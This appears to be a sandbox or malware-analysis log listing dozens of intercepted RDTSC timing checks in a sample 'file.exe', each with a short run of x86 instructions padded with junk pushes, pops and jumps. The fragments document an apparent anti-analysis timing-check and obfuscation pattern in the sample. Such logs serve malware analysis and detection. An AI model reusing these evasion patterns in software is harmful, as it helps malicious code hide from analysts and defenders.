Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE8CD second address: 9AE8F4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F988C7CE31Eh 0x00000008 pushad 0x00000009 popad 0x0000000a ja 00007F988C7CE316h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 je 00007F988C7CE31Ch 0x00000019 jc 00007F988C7CE316h 0x0000001f jnl 00007F988C7CE322h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE8F4 second address: 9AE902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F988D0B0286h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AE902 second address: 9AE908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AEA39 second address: 9AEA45 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F988D0B0286h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9AEA45 second address: 9AEA4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B36EC second address: 9B36F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C22A5 second address: 9C22AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F988C7CE316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C22AF second address: 9C22B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7F52 second address: 9C7F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6EB2 second address: 9C6ED4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0299h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6ED4 second address: 9C6EE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007F988C7CE322h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6EE1 second address: 9C6EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C6EE7 second address: 9C6EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C71B1 second address: 9C71B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7C41 second address: 9C7C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7C47 second address: 9C7C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7C51 second address: 9C7C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7C59 second address: 9C7C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C7C5E second address: 9C7C6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007F988C7CE316h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CBCDD second address: 9CBCE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CB855 second address: 9CB87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F988C7CE316h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F988C7CE327h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CB87D second address: 9CB882 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF94C second address: 9CF950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF950 second address: 9CF956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF956 second address: 9CF95C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF7FB second address: 9CF800 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF800 second address: 9CF806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DA4A9 second address: 9DA4B9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F988D0B0286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DA4B9 second address: 9DA4BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9DA4BD second address: 9DA4D8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F988D0B0286h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F988D0B028Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE38B second address: 9EE3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F988C7CE322h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE3A4 second address: 9EE3AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE3AA second address: 9EE3AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE3AE second address: 9EE3CB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F988D0B0286h 0x00000008 jno 00007F988D0B0286h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F988D0B028Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE3CB second address: 9EE3CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9EE3CF second address: 9EE3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F0ACF second address: 9F0AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0959F second address: A095B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0290h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A09759 second address: A0975F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0975F second address: A09763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C738 second address: A0C77D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], eax 0x00000009 sub dword ptr [ebp+122D3527h], esi 0x0000000f push 00000004h 0x00000011 add dl, FFFFFFEAh 0x00000014 call 00007F988C7CE319h 0x00000019 push ecx 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d pop edx 0x0000001e pop ecx 0x0000001f push eax 0x00000020 jmp 00007F988C7CE329h 0x00000025 mov eax, dword ptr [esp+04h] 0x00000029 pushad 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C77D second address: A0C7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988D0B0296h 0x00000009 popad 0x0000000a jmp 00007F988D0B0292h 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C7B2 second address: A0C7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C7B6 second address: A0C7BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C7BA second address: A0C7C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C9D7 second address: A0C9DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F9D4 second address: A0F9DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F9DA second address: A0F9FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F988D0B0294h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F988D0B0286h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0F9FA second address: A0FA33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F988C7CE316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F988C7CE321h 0x00000017 jmp 00007F988C7CE326h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0FA33 second address: A0FA49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F988D0B028Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1167E second address: A11698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE321h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11698 second address: A116A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116A0 second address: A116A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116A5 second address: A116B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F988D0B0286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116B0 second address: A116B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116B6 second address: A116D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988D0B028Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F988D0B028Eh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A116D3 second address: A116DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9241A5 second address: 9241BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9241BC second address: 9241C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9241C2 second address: 9241C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924365 second address: 924373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924373 second address: 924384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988D0B028Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 924384 second address: 924389 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290328 second address: 5290338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290338 second address: 529033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 529033C second address: 529034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 529034B second address: 5290352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290352 second address: 5290358 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290358 second address: 5290379 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F988C7CE324h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290379 second address: 529037F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 529037F second address: 5290383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5290383 second address: 5290387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0577 second address: 52C057B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C057B second address: 52C0581 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0581 second address: 52C05A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE324h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx esi, bx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C05A3 second address: 52C060F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, ax 0x0000000e pushfd 0x0000000f jmp 00007F988D0B028Ah 0x00000014 sub si, 5A18h 0x00000019 jmp 00007F988D0B028Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007F988D0B0296h 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F988D0B0297h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C060F second address: 52C0615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0615 second address: 52C0678 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B028Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F988D0B028Fh 0x00000013 sbb esi, 4AC0899Eh 0x00000019 jmp 00007F988D0B0299h 0x0000001e popfd 0x0000001f call 00007F988D0B0290h 0x00000024 mov dx, cx 0x00000027 pop ecx 0x00000028 popad 0x00000029 xchg eax, ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bh, ah 0x0000002f mov bx, 2A86h 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0678 second address: 52C0691 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bl, E4h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0691 second address: 52C0697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0697 second address: 52C069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C069B second address: 52C06AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C06AA second address: 52C06AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C06AE second address: 52C06B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C06B4 second address: 52C06FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, bx 0x00000010 pushfd 0x00000011 jmp 00007F988C7CE329h 0x00000016 add si, 66A6h 0x0000001b jmp 00007F988C7CE321h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C06FF second address: 52C0788 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F988D0B0297h 0x00000009 adc ecx, 768139DEh 0x0000000f jmp 00007F988D0B0299h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F988D0B0290h 0x0000001b or ecx, 433F71D8h 0x00000021 jmp 00007F988D0B028Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a lea eax, dword ptr [ebp-04h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx ebx, ax 0x00000033 pushfd 0x00000034 jmp 00007F988D0B028Ch 0x00000039 or ax, BC38h 0x0000003e jmp 00007F988D0B028Bh 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0788 second address: 52C07F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE329h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F988C7CE31Ch 0x00000011 add eax, 2E80F5C8h 0x00000017 jmp 00007F988C7CE31Bh 0x0000001c popfd 0x0000001d mov edi, esi 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 jmp 00007F988C7CE31Bh 0x00000027 mov cx, 762Fh 0x0000002b popad 0x0000002c nop 0x0000002d jmp 00007F988C7CE322h 0x00000032 push dword ptr [ebp+08h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C07F7 second address: 52C07FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C07FD second address: 52C080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988C7CE31Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C086E second address: 52C0874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0874 second address: 52C0878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C08B4 second address: 52C08BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C08BA second address: 52C08DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F988C7CE31Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C08DC second address: 52C08E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
